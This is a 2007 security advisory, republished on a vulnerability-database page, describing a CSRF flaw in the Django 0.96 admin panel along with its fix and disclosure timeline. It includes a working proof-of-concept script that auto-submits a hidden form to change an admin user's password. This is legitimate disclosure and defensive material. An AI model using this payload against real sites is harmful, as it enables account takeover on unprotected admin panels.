Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18323
HistoryOct 31, 2007 - 12:00 a.m.

Django 0.96 (stable) Admin Panel CSRF

2007-10-3100:00:00
vulners.com
24
JSON

Author: J. Carlos Nieto.
Date: Oct 21, 2007

There exists a security hole in the default django's admin panel.

Background

Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.
Django has an automatic admin panel that allows a person with admin
privileges to modify the database tables, it allows to change any user
password too.
See more at http://www.djangoproject.com

Summary

django has, by default, no CSRF protection, this may allow an attacker
to change any user password by tricking a victim with admin privileges
into a special forged web page (even in a a totally different server)
that sends a request to change the password of the user with id = n. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen.

Severity

Mild. This problem exists only with the default installation and can be
easily solved using a middleware found in here:
http://www.djangoproject.com/documentation/csrf/.

Proof of concept

<script type="text/javascript">
window.onload = function() {
var url = "http://127.0.0.1:8000/admin/auth/user/1/password/&quot;;

var pass = &quot;funky&quot;;

var param = {
    password1: pass,
    password2: pass
};

var form = document.createElement&#40;&#39;form&#39;&#41;;
form.action = url;
form.method = &#39;post&#39;;
form.target = &#39;hidden&#39;;
form.style.display = &#39;none&#39;;

for &#40;var i in param&#41; {
    try {
        // ie
        var input = document.createElement&#40;&#39;&lt;input name=&quot;&#39;+i+&#39;&quot;&gt;&#39;&#41;;
    } catch&#40;e&#41; {
        // other browsers
        var input = document.createElement&#40;&#39;input&#39;&#41;;
        input.name = i;
    }
    input.setAttribute&#40;&#39;value&#39;,  param[i]&#41;;
    form.appendChild&#40;input&#41;;
}
document.body.appendChild&#40;form&#41;;

form.submit&#40;&#41;;

}
</script>

<iframe name="hidden" style="display: none"></iframe>

Solution

Use the django's CSRF protection in all your applications. Take a look
at http://www.djangoproject.com/documentation/csrf/.

Disclosure Timeline

2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response
2007.10.21 - Advisory release

License

Copyright 2007 J. Carlos Nieto

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.

JSON